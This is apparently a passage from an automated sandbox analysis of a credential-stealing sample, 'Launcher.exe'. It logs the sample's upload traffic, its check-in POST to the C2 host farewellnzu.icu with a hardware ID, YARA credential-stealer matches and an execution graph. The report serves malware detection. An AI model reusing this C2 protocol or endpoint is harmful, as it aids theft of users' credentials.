                                                                      2024-11-23 14:13:09 UTC15331OUTData Raw: 2f 16 d8 00 7b 80 e5 f1 f7 96 71 73 9a 16 d2 33 be 33 fe 53 cd 2c 28 e2 a9 63 f3 03 c0 3d f7 93 d5 f5 93 d7 40 1f 0d ff 79 cc 5b 79 4c 34 3d 46 73 c7 f5 57 5f bd 2e fa 51 af b2 b3 13 c6 4a 5d 66 88 e2 78 46 fa f1 da c9 63 92 48 38 88 6f ec ca e5 63 ff 3c 0b 7d 9b 9e eb dc 64 7f 11 65 29 15 02 ee 53 ee 2f 3f 96 ce 72 7a a4 87 e3 13 53 3c c4 dd 2d 06 97 d0 0c 43 09 50 b2 db 64 4f e0 19 3c 3e e1 c2 d2 d0 3f f1 a2 a7 8a 22 f7 17 24 79 c0 70 a5 ee 8b f2 15 c1 1f 03 fd b9 f5 fa 43 3f ac 05 e9 c5 91 d2 c2 c2 b3 95 ae a1 26 bc a2 ef d1 84 a7 4d 70 43 f1 58 33 4e 69 dc 1e 04 7e d0 e0 4b 78 47 88 08 7b 61 a8 a4 c0 30 eb 8c f2 a2 ea b6 54 b0 72 8e ff f9 b4 8b b8 36 d4 63 7d 62 f6 de bd 3d 2d bf 79 a4 d7 30 0f df 5e bb ee ee 72 c3 e2 eb 28 e9 7b b5 db 0b 4b c3 85 fb
                                                                      Data Ascii: /{qs33S,(c=@y[yL4=FsW_.QJ]fxFcH8oc<}de)S/?rzS<-CPdO<>?"$ypC?&MpCX3Ni~KxG{a0Tr6c}b=-y0^r({K
                                                                      2024-11-23 14:13:09 UTC15331OUTData Raw: 57 92 aa c6 b8 8a fd a5 6c ee 64 59 7f 90 8b 66 67 e2 e7 09 61 ae 5b 95 fd c5 c5 23 5b ae 29 e2 29 e2 af d4 66 9f 14 33 cb 95 ff dd 88 f4 e3 ca 73 72 68 0c eb 5f 1d b2 df 0c 3a c6 5b a8 b7 3c 50 a8 99 c3 58 fb fa dd 2a f6 10 9d 87 9a 8b 3e e5 e0 b8 ea 14 7e 68 63 c0 fd be e2 3d cd 45 27 f9 e4 a8 4f 1a 2f 5b 7e 62 6f de da 74 52 ea f9 d4 fb c6 48 9d 1e dc 97 01 c8 75 f0 5a 29 6a 72 eb e5 c6 bb 31 2d 34 cb 60 b6 93 33 70 4b 67 5d 40 22 2e ef 47 06 b7 2e fa 93 a2 f1 23 b8 be dd df 41 14 d4 fc 0c ee 3b fd 57 1d 87 3f c3 92 de 9b 2d 52 28 71 89 1d be d6 ae 69 af 01 8c 60 93 c3 c2 71 4f c2 0f 94 2d de a2 df e0 03 d0 9c c4 01 6b 62 2a 67 8f 32 e9 e4 dc a2 ea a6 41 35 83 79 61 44 26 e6 45 52 68 d4 a8 10 45 e8 44 6d cb 8a 81 fc 83 47 31 8d c1 35 c5 59 7f e9 ed c7
                                                                      Data Ascii: WldYfga[#[))f3srh_:[<PX*>~hc=E'O/[~botRHuZ)jr1-4`3pKg]@".G.#A;W?-R(qi`qO-kb*g2A5yaD&ERhEDmG15Y
                                                                      2024-11-23 14:13:09 UTC15331OUTData Raw: 20 a3 a5 a0 ff fe 84 cb 1d bf 0c ce 0a 16 9e 3c 4f b7 12 ba 25 95 53 a3 1f a3 15 93 58 45 bf 70 72 1a fc f0 87 de 9a 62 95 42 62 11 7f c1 c1 e5 ff 1a fd 10 50 78 97 bf 30 0f 73 01 03 b6 d0 c0 c0 07 9a 37 47 c8 32 a7 18 21 d2 ad aa cf 20 a9 1e af 97 be 55 87 90 79 d0 70 04 45 3f 3a f7 83 7e 36 85 d1 10 de 27 8a 1f 79 eb 6b ac cf f1 56 eb aa e0 e0 57 74 0d 6c 5f 7c ee 98 93 bc 2a 2e 88 90 79 fc d0 c4 39 d8 03 df 28 31 94 9c 2b 84 70 59 13 a7 b1 2c 60 9b 21 bd 74 66 28 bb 18 f0 02 69 c6 2b 31 1e 11 f0 1e 7f f4 45 f5 f6 4a ba 03 d5 44 c6 e4 24 7f 39 78 96 5d 70 19 0d f3 09 a8 83 97 b9 36 13 d0 29 3e ec da 93 1f 55 a9 a3 c8 1c 6c 5e 2c fe e9 86 a8 3d e3 58 6a 8a 38 de 5f 3b b3 82 b3 0f 1b 59 22 ef 00 65 fa 80 12 2f d1 37 6d 42 f7 49 35 c6 c0 90 4e eb f6 cc fb
                                                                      Data Ascii: <O%SXEprbBbPx0s7G2! UypE?:~6'ykVWtl_|*.y9(1+pY,`!tf(i+1EJD$9x]p6)>Ul^,=Xj8_;Y"e/7mBI5N
                                                                      2024-11-23 14:13:09 UTC15331OUTData Raw: a0 d2 ab e6 a6 2a 0a 13 bc 6a d0 da 3f 60 7b 8e 5e 6a 33 9e b9 31 29 79 41 5c df 77 c5 d5 eb 20 d5 6b 56 49 2e 22 50 e8 30 a9 d9 31 8c 3c 92 5d 68 33 32 af b8 5f b4 ba ca f2 6b a7 b1 ff 45 ed 49 a3 45 77 af 9e 06 a3 57 98 68 d0 5c c4 99 fc 75 b0 ce f5 a6 24 4b 44 b8 f2 4c 92 bb 5a 0c e9 c6 a8 20 a5 06 3e c3 7a 10 71 53 6c 03 cb 6e fd 45 4f c6 8e 47 a4 17 80 31 83 4d 7d b9 66 3d de f7 72 cb b8 c0 d3 a4 9e a8 10 cb 73 b7 1c 77 dd 28 60 d9 ba 65 98 57 19 ef 52 3a 47 93 5c 88 a1 a6 32 97 4f c6 59 59 29 65 28 f7 c5 66 88 89 c5 cb 7c 59 fd 59 9f c3 e4 e5 ff 41 3a 4f bb 39 8b b9 2f 3b a9 b7 b9 ef 1c 6b 2b 43 e8 93 9c d6 12 78 12 d7 66 00 9f 65 bb a9 32 4a 25 9f 29 24 a9 0b f0 d5 84 fd 62 35 fc 23 52 65 e2 84 ab ca ef 26 78 0b 1c f2 e6 74 9a 3a 25 4a 3d 5b 95 42
                                                                      Data Ascii: *j?`{^j31)yA\w kVI."P01<]h32_kEIEwWh\u$KDLZ >zqSlnEOG1M}f=rsw(`eWR:G\2OYY)e(f|YYA:O9/;k+Cxfe2J%)$b5#Re&xt:%J=[B
                                                                      2024-11-23 14:13:09 UTC15331OUTData Raw: d9 22 ed bc 71 e3 c5 7a 89 9c 31 78 f5 3f bc 64 6a 4e 31 5a 44 e0 87 b9 3f 4a 53 bb 4d 06 fe ea 21 e0 f7 29 35 10 88 2d fd f2 cc bb 33 ef ba 9a 7a 99 7d ea cc 60 e6 35 ea 1d a1 0a e0 ef 87 ee 3e 4d 35 ff 4a 04 bf cb 7d 97 1e 3d a6 ce be 95 d3 de bf 8b 08 9a 0d c1 da 3d 19 78 12 67 8f 27 cd f9 6c 68 c9 c1 16 8b 9b e6 e9 b6 1e 5c 9d bd d9 d7 a8 91 15 a4 c6 d6 33 11 1f 27 2f 6f 68 9d a3 47 c3 b2 58 1c db 62 43 8b 44 3d c1 6a b9 ce 69 69 cf bc 4a 4e d9 90 ba 0e 1d 4c 88 72 f7 7d ba 6d ce 23 99 18 55 b5 cd c1 c0 cd 67 b8 5a 23 d9 af c9 23 b9 f2 8c 24 ec e9 a4 3d 52 26 bb eb f4 13 24 b4 43 f3 83 00 13 36 f2 28 9e 11 80 ba 22 83 cf a0 0a 10 2e 39 d1 67 a6 c9 e1 6f 74 ed 9c e0 79 5d 84 9f 0b d8 41 2f 25 61 bf 5c 09 13 a4 1c 1a 52 50 4e 2b e5 fa 1d be 27 75 62 dc
                                                                      Data Ascii: "qz1x?djN1ZD?JSM!)5-3z}`5>M5J}==xg'lh\3'/ohGXbCD=jiiJNLr}m#UgZ##$=R&$C6(".9goty]A/%a\RPN+'ub
                                                                      2024-11-23 14:13:09 UTC15331OUTData Raw: eb 00 ed 87 1d 6b 73 fe 9d 7c 87 1c 6e e2 aa 43 7b 08 2e 0a 91 99 fd 97 81 4d a5 d3 39 bd 7c e6 bb 0d f7 20 fc 3e 97 71 18 3d 0b 8d ea 7f 29 d7 07 82 f1 38 20 0f 3c c0 be a6 cd 17 6a 4f 92 ac 0a 4d 79 6d 4a f6 6d 00 c8 c1 fd ef 03 ce 83 1c de 39 63 27 41 b2 ef c3 54 b4 f6 58 60 9f df 0d 8f e1 12 a8 42 2f bf 5e 0d 22 97 ce fd 5a ef cb 8b 4d 4a b6 c5 05 a0 fb db 5c d6 c7 70 59 71 1b 6d a2 eb 99 bc f9 85 ba 8b ba 77 25 98 32 c0 61 c5 f0 9f 00 4e 14 c3 db ac 19 c9 38 73 62 ec 09 cf 70 c9 a2 e5 80 0e 5c 95 65 b3 bc e8 ab 8f 79 ce 79 c0 ee 8e ec 2d be 9d 10 41 69 18 62 fd 3b 87 5b 6d b8 e4 3a 0b 81 06 16 cc 0c 47 3a 65 de be 1b ed 26 3e 5f b4 bb bc ad 2d a5 7c 2f 77 7d 63 8e d7 ad 56 c5 09 a1 d8 7e 2f d2 67 c8 38 46 b1 ee 65 6b 40 20 6a 99 d5 e3 25 9c 26 16 3a
                                                                      Data Ascii: ks|nC{.M9| >q=)8 <jOMymJm9c'ATX`B/^"ZMJ\pYqmw%2aN8sbp\eyy-Aib;[m:G:e&>_-|/w}cV~/g8Fek@ j%&:
                                                                      2024-11-23 14:13:09 UTC15331OUTData Raw: e2 e1 3a cc bd c7 f3 83 db a3 b8 7a 91 89 c8 84 00 e5 45 f9 cd e1 7a 6e a2 0e 83 58 c1 66 4a a2 98 2d ab d5 bd 95 bc 71 91 77 0b 6e f1 71 e6 70 e2 ec 00 76 16 52 45 c8 a8 1e b9 19 ba 8f ac 42 72 6b b7 f5 14 2b 7c fc f7 df f4 3a 74 fe 57 97 23 54 69 ec fe d9 57 f3 5a 68 f0 7e da 9c 0f 90 b3 0d b8 a7 29 28 c4 da b3 df e0 ca b6 0c 1f 7a 20 fa bc ad e7 1c 5b 47 ca 5b 0f 24 dc a7 a5 f9 71 45 03 c0 e6 1e 06 73 ad 3e 92 c8 20 32 4c 34 d7 19 12 be 24 05 d1 4b 81 5d 86 a8 90 0a 63 04 31 1e 16 42 94 64 f9 ae dc 72 3d 42 0b 9b 2d 0a a9 d1 6c 5d 53 c3 be 2b 01 dd ab 5e 59 d1 0e 48 f0 34 20 ed 8d 5b 8d 4d a7 bf b2 87 c0 a7 3d a6 ae db 24 49 d9 75 26 e8 d8 9f 2b 79 9a 75 ca 02 37 7a 53 db 6d 9c a3 57 9b d7 61 4f 91 c6 69 86 3c 38 e9 b9 ba 7d 7c e4 7d 0c 69 8a 9b 14 61
                                                                      Data Ascii: :zEznXfJ-qwnqpvREBrk+|:tW#TiWZh~)(z [G[$qEs> 2L4$K]c1Bdr=B-l]S+^YH4 [M=$Iu&+yu7zSmWaOi<8}|}ia
                                                                      2024-11-23 14:13:09 UTC15331OUTData Raw: ea 7a dc 74 7b 00 97 6d de 2f 4c 15 be ee d5 1c c3 bb 41 e0 9e b6 91 9e 46 82 6f ce a7 59 69 7c e5 45 6d fc 5e 25 e3 cf 1d d5 68 19 28 e9 b3 93 07 6c 7e 47 4e 3e 12 13 19 bc f9 d7 3c 7f 78 cf c3 fa 84 88 75 21 2b a4 5b 7d ab e3 6c 36 cc 96 64 09 a3 80 fc af d1 fc 1b d6 ce 2c 83 a3 57 58 22 e0 e9 0e e7 5f c9 17 8f e4 38 0b 33 32 6d e9 66 c6 9b 78 b6 38 ca aa ca 95 5f d7 29 d5 42 7a 79 4b db c8 9e a2 da 13 8a 0f 05 1b 4f 90 1e 6a 93 ca 35 aa 10 e4 ad f8 da fd d1 53 5d 9b 11 ba ba e0 93 e8 b1 c7 ff 7d 4c 96 8c 25 f2 94 15 13 35 c5 1b 14 e9 0d 65 2b 45 cb df b1 32 73 9e 15 d5 17 7e 78 87 d7 cf 64 2e b0 37 b8 f6 31 9f 0c 46 c3 e6 5a ca c3 89 5e 7f 33 37 46 4b d8 c1 81 a3 be 73 94 01 8b 3f 6b 9b 5c a7 7c 8b 5d 26 1d 14 56 36 16 9f 20 c6 5c 23 e0 62 0e 25 bc 1e
                                                                      Data Ascii: zt{m/LAFoYi|Em^%h(l~GN><xu!+[}l6d,WX"_832mfx8_)BzyKOj5S]}L%5e+E2s~xd.71FZ^37FKs?k\|]&V6 \#b%
                                                                      2024-11-23 14:13:12 UTC1027INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:13:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=j8erbfu8h021brlfkvilr2ltb3; expires=Wed, 19-Mar-2025 07:59:50 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qVn9L%2FUVKljjphliD0FhfKUR6Su3WZeZ%2BuX%2BvmPPQR3yRL7H5Z%2FKuZmfgdTTdGYJptMHR%2FYLXE8MQq%2B2gAxdhUDP0OKi%2B7u3VDuR8C7W39W25WT3%2BasLHnQam7gvrUEoYjs%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71c2220983de97-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1491&sent=336&recv=592&lost=0&retrans=0&sent_bytes=2836&recv_bytes=574452&delivery_rate=1913499&cwnd=234&unsent_bytes=0&cid=36f99218679018ac&ts=2329&x=0"


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.649724172.67.198.614435688C:\Users\user\Desktop\Launcher.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:13:13 UTC263OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 89
                                                                      Host: farewellnzu.icu
                                                                      2024-11-23 14:13:13 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 7a 6e 6e 75 61 6f 73 76 67 68 75 6e 26 6a 3d 26 68 77 69 64 3d 41 45 39 46 32 42 46 34 33 43 44 37 36 43 31 39 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41
                                                                      Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--znnuaosvghun&j=&hwid=AE9F2BF43CD76C19C8852029FBE145BA
                                                                      2024-11-23 14:13:14 UTC1019INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:13:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=i92627cq6radc5a9ia62bi9mfs; expires=Wed, 19-Mar-2025 07:59:53 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UJ3%2FQE0PAbHDLCVesVLutPpziMpuSd7gq%2BZjZjV4sjZu40%2FrniEuytw9XPvBKNco83f%2F2GqOlYhLxZW9AFnbCu%2FGN%2FOkwNuh8B2QGDb57JNixOsb3Lm%2F8AVXv9ZcRzR%2BIc%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71c2397d050f79-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1502&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=988&delivery_rate=1902280&cwnd=241&unsent_bytes=0&cid=fcfc9a7add2e4987&ts=724&x=0"
                                                                      2024-11-23 14:13:14 UTC54INData Raw: 33 30 0d 0a 5a 62 38 33 53 63 61 4e 42 78 4f 58 6d 4a 44 33 4b 4c 5a 71 6f 47 4c 68 68 50 45 77 4e 42 52 44 4c 6d 67 65 51 50 6a 79 4d 37 6b 2b 34 67 3d 3d 0d 0a
                                                                      Data Ascii: 30Zb83ScaNBxOXmJD3KLZqoGLhhPEwNBRDLmgeQPjyM7k+4g==
                                                                      2024-11-23 14:13:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:09:12:52
                                                                      Start date:23/11/2024
                                                                      Path:C:\Users\user\Desktop\Launcher.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Launcher.exe"
                                                                      Imagebase:0x230000
                                                                      File size:512'512 bytes
                                                                      MD5 hash:3CA9CA734F501C8DE4270556F80F0F60
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:09:12:52
                                                                      Start date:23/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:09:12:53
                                                                      Start date:23/11/2024
                                                                      Path:C:\Users\user\Desktop\Launcher.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Launcher.exe"
                                                                      Imagebase:0x230000
                                                                      File size:512'512 bytes
                                                                      MD5 hash:3CA9CA734F501C8DE4270556F80F0F60
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2215064071.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2215064071.0000000003503000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:6.8%
                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                        Signature Coverage:9.5%
                                                                        Total number of Nodes:1903
                                                                        Total number of Limit Nodes:23
                                                                        execution_graph 10506 24a630 10507 24a638 10506->10507 10525 24d30a 10507->10525 10509 24a643 10532 24a110 10509->10532 10511 24a464 4 API calls 10513 24a6da 10511->10513 10512 24a658 __RTC_Initialize 10523 24a6b5 10512->10523 10538 249f8a 10512->10538 10515 24a671 10541 24c3c5 10515->10541 10519 24a687 10574 24a953 10519->10574 10521 24a6aa 10580 24c2c4 10521->10580 10523->10511 10524 24a6d2 10523->10524 10526 24d33c 10525->10526 10527 24d319 10525->10527 10526->10509 10527->10526 10528 250777 __strnicoll 14 API calls 10527->10528 10529 24d32c 10528->10529 10530 24cd89 __strnicoll 48 API calls 10529->10530 10531 24d337 10530->10531 10531->10509 10533 24a120 10532->10533 10534 24a11c 10532->10534 10535 24a464 4 API calls 10533->10535 10537 24a12d ___scrt_release_startup_lock 10533->10537 10534->10512 10536 24a196 10535->10536 10537->10512 10587 249f9f 10538->10587 10542 24c41f 10541->10542 10543 24c457 10542->10543 10544 24c441 10542->10544 10552 24a67c 10542->10552 10545 24f8a0 58 API calls 10543->10545 10546 250777 __strnicoll 14 API calls 10544->10546 10547 24c45d 10545->10547 10548 24c446 10546->10548 10622 251a98 GetModuleFileNameW 10547->10622 10550 24cd89 __strnicoll 48 API calls 10548->10550 10550->10552 10552->10523 10573 24a938 InitializeSListHead 10552->10573 10557 24c4c5 10560 24c55c 48 API calls 10557->10560 10558 24c4b9 10559 250777 __strnicoll 14 API calls 10558->10559 10561 24c4be 10559->10561 10562 24c4db 10560->10562 10565 2500eb __freea 14 API calls 10561->10565 10562->10561 10563 24c4ff 10562->10563 10644 25126a 10563->10644 10565->10552 10567 24c516 10568 2500eb __freea 14 API calls 10567->10568 10570 24c51e 10568->10570 10569 24c520 10571 2500eb __freea 14 API calls 10569->10571 10572 2500eb __freea 14 API calls 10570->10572 10571->10570 10572->10552 10573->10519 10871 24c6d0 10574->10871 10576 24a964 10577 24a96b 10576->10577 10578 24a464 4 API calls 10576->10578 10577->10521 10579 24a973 10578->10579 10581 24f02a _unexpected 48 API calls 10580->10581 10583 24c2cf 10581->10583 10582 24c307 10582->10523 10583->10582 10584 250777 __strnicoll 14 API calls 10583->10584 10585 24c2fc 10584->10585 10586 24cd89 __strnicoll 48 API calls 10585->10586 10586->10582 10588 249fb5 10587->10588 10589 249fae 10587->10589 10596 24c758 10588->10596 10593 24c7c9 10589->10593 10592 249f95 10592->10515 10594 24c758 51 API calls 10593->10594 10595 24c7db 10594->10595 10595->10592 10599 24c9bb 10596->10599 10600 24c9c7 ___scrt_is_nonwritable_in_current_image 10599->10600 10607 24d181 EnterCriticalSection 10600->10607 10602 24c9d5 10608 24c7df 10602->10608 10604 24c9e2 10618 24ca0a 10604->10618 10607->10602 10609 24c7fa 10608->10609 10617 24c86d _unexpected 10608->10617 10610 2520e4 51 API calls 10609->10610 10616 24c84d 10609->10616 10609->10617 10612 24c843 10610->10612 10611 2520e4 51 API calls 10613 24c863 10611->10613 10615 2500eb __freea 14 API calls 10612->10615 10614 2500eb __freea 14 API calls 10613->10614 10614->10617 10615->10616 10616->10611 10616->10617 10617->10604 10621 24d198 LeaveCriticalSection 10618->10621 10620 24c789 10620->10592 10621->10620 10623 251ac7 GetLastError 10622->10623 10624 251ad8 10622->10624 10625 25079d __dosmaperr 14 API calls 10623->10625 10626 251294 48 API calls 10624->10626 10627 251ad3 10625->10627 10628 251b09 10626->10628 10630 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10627->10630 10670 251b74 10628->10670 10631 24c470 10630->10631 10632 24c55c 10631->10632 10634 24c582 10632->10634 10636 24c5e0 10634->10636 10698 251c36 10634->10698 10635 24c4a3 10638 24c3d0 10635->10638 10636->10635 10637 251c36 48 API calls 10636->10637 10637->10636 10639 24c413 10638->10639 10640 24c3e1 10638->10640 10639->10557 10639->10558 10640->10639 10641 250827 _unexpected 14 API calls 10640->10641 10642 24c40a 10641->10642 10643 2500eb __freea 14 API calls 10642->10643 10643->10639 10645 251385 10644->10645 10646 251395 10645->10646 10655 2513ab _strpbrk 10645->10655 10647 250777 __strnicoll 14 API calls 10646->10647 10648 25139a 10647->10648 10649 24cd89 __strnicoll 48 API calls 10648->10649 10663 24c50e 10649->10663 10650 251416 10650->10650 10651 24c3d0 14 API calls 10650->10651 10653 251459 10651->10653 10656 251462 10653->10656 10664 251478 10653->10664 10655->10650 10657 25142a 10655->10657 10704 25174a 10655->10704 10756 2517fb 10655->10756 10658 2500eb __freea 14 API calls 10656->10658 10792 25169e 10657->10792 10658->10657 10659 2514d8 10660 2500eb __freea 14 API calls 10659->10660 10662 2514e5 10660->10662 10665 25169e 14 API calls 10662->10665 10663->10567 10663->10569 10664->10659 10667 2514f5 10664->10667 10798 25444e 10664->10798 10665->10663 10668 24cdb6 __strnicoll 11 API calls 10667->10668 10669 251501 10668->10669 10671 251b81 10670->10671 10672 251b90 10670->10672 10671->10627 10673 251bbd 10672->10673 10674 251b98 10672->10674 10675 252151 ___scrt_uninitialize_crt WideCharToMultiByte 10673->10675 10674->10671 10691 251b39 10674->10691 10677 251bcd 10675->10677 10678 251bd4 GetLastError 10677->10678 10680 251bea 10677->10680 10679 25079d __dosmaperr 14 API calls 10678->10679 10682 251be0 10679->10682 10681 251bfb 10680->10681 10683 251b39 14 API calls 10680->10683 10681->10671 10695 2515b4 10681->10695 10685 250777 __strnicoll 14 API calls 10682->10685 10683->10681 10685->10671 10687 251c15 GetLastError 10688 25079d __dosmaperr 14 API calls 10687->10688 10689 251c21 10688->10689 10690 250777 __strnicoll 14 API calls 10689->10690 10690->10671 10692 251b44 10691->10692 10693 250777 __strnicoll 14 API calls 10692->10693 10694 251b4d 10693->10694 10694->10671 10696 252151 ___scrt_uninitialize_crt WideCharToMultiByte 10695->10696 10697 2515d1 10696->10697 10697->10671 10697->10687 10701 251c4e 10698->10701 10702 24f8e8 __strnicoll 48 API calls 10701->10702 10703 251c49 10702->10703 10703->10634 10705 251756 10704->10705 10705->10705 10706 25176f 10705->10706 10707 250827 _unexpected 14 API calls 10705->10707 10706->10655 10708 251784 10707->10708 10709 251797 10708->10709 10710 25444e 48 API calls 10708->10710 10711 25444e 48 API calls 10709->10711 10713 2517ee 10709->10713 10710->10709 10712 2517b0 10711->10712 10712->10713 10714 2517b7 10712->10714 10715 24cdb6 __strnicoll 11 API calls 10713->10715 10807 2516c3 10714->10807 10717 2517fa 10715->10717 10720 251842 10717->10720 10818 254550 10717->10818 10719 2517d0 10722 2500eb __freea 14 API calls 10719->10722 10723 25185b 10720->10723 10725 25186e 10720->10725 10721 2500eb __freea 14 API calls 10721->10719 10722->10706 10724 25174a 56 API calls 10723->10724 10755 251866 10724->10755 10726 251294 48 API calls 10725->10726 10728 2518c2 10726->10728 10730 25132c 17 API calls 10728->10730 10729 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10731 251a7e 10729->10731 10732 2518d0 FindFirstFileExW 10730->10732 10731->10655 10733 2518f8 10732->10733 10741 251926 10732->10741 10734 25174a 56 API calls 10733->10734 10736 251906 10734->10736 10735 251294 48 API calls 10735->10741 10737 2500eb __freea 14 API calls 10736->10737 10736->10755 10737->10755 10739 25174a 56 API calls 10739->10741 10740 2519d7 FindNextFileW 10740->10741 10744 2519ed 10740->10744 10741->10735 10741->10739 10741->10740 10742 251a3c 10741->10742 10743 2500eb __freea 14 API calls 10741->10743 10821 2515d8 10741->10821 10745 251a50 FindClose 10742->10745 10747 2500eb __freea 14 API calls 10742->10747 10743->10741 10746 251a1d FindClose 10744->10746 10844 253f60 10744->10844 10748 251a5f 10745->10748 10745->10755 10750 251a2c 10746->10750 10746->10755 10751 251a4f 10747->10751 10752 2500eb __freea 14 API calls 10748->10752 10754 2500eb __freea 14 API calls 10750->10754 10751->10745 10752->10755 10754->10755 10755->10729 10757 251842 10756->10757 10759 251825 10756->10759 10758 25186e 10757->10758 10760 25185b 10757->10760 10762 251294 48 API calls 10758->10762 10759->10757 10763 254550 48 API calls 10759->10763 10761 25174a 60 API calls 10760->10761 10791 251866 10761->10791 10764 2518c2 10762->10764 10763->10759 10766 25132c 17 API calls 10764->10766 10765 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10767 251a7e 10765->10767 10768 2518d0 FindFirstFileExW 10766->10768 10767->10655 10769 2518f8 10768->10769 10777 251926 10768->10777 10770 25174a 60 API calls 10769->10770 10772 251906 10770->10772 10771 251294 48 API calls 10771->10777 10773 2500eb __freea 14 API calls 10772->10773 10772->10791 10773->10791 10774 2515d8 18 API calls 10774->10777 10775 25174a 60 API calls 10775->10777 10776 2519d7 FindNextFileW 10776->10777 10780 2519ed 10776->10780 10777->10771 10777->10774 10777->10775 10777->10776 10778 251a3c 10777->10778 10779 2500eb __freea 14 API calls 10777->10779 10781 251a50 FindClose 10778->10781 10783 2500eb __freea 14 API calls 10778->10783 10779->10777 10782 251a1d FindClose 10780->10782 10785 253f60 48 API calls 10780->10785 10784 251a5f 10781->10784 10781->10791 10786 251a2c 10782->10786 10782->10791 10787 251a4f 10783->10787 10788 2500eb __freea 14 API calls 10784->10788 10789 251a1a 10785->10789 10790 2500eb __freea 14 API calls 10786->10790 10787->10781 10788->10791 10789->10782 10790->10791 10791->10765 10793 2516a8 10792->10793 10794 2516b8 10793->10794 10795 2500eb __freea 14 API calls 10793->10795 10796 2500eb __freea 14 API calls 10794->10796 10795->10793 10797 2516bf 10796->10797 10797->10663 10799 254459 10798->10799 10801 254487 10799->10801 10802 254473 10799->10802 10805 2544ac 10799->10805 10800 250777 __strnicoll 14 API calls 10803 25447d 10800->10803 10801->10664 10802->10800 10802->10801 10804 24cd89 __strnicoll 48 API calls 10803->10804 10804->10801 10805->10801 10806 250777 __strnicoll 14 API calls 10805->10806 10806->10803 10808 2516d5 10807->10808 10809 2516d1 10807->10809 10810 251700 10808->10810 10811 2516da 10808->10811 10809->10719 10809->10721 10810->10809 10814 2520e4 51 API calls 10810->10814 10812 250827 _unexpected 14 API calls 10811->10812 10813 2516e3 10812->10813 10815 2500eb __freea 14 API calls 10813->10815 10816 251720 10814->10816 10815->10809 10817 2500eb __freea 14 API calls 10816->10817 10817->10809 10852 254567 10818->10852 10820 254562 10820->10717 10822 2515e6 10821->10822 10823 251602 10821->10823 10824 251312 14 API calls 10822->10824 10825 251625 10823->10825 10826 251609 10823->10826 10839 2515f0 10824->10839 10827 252151 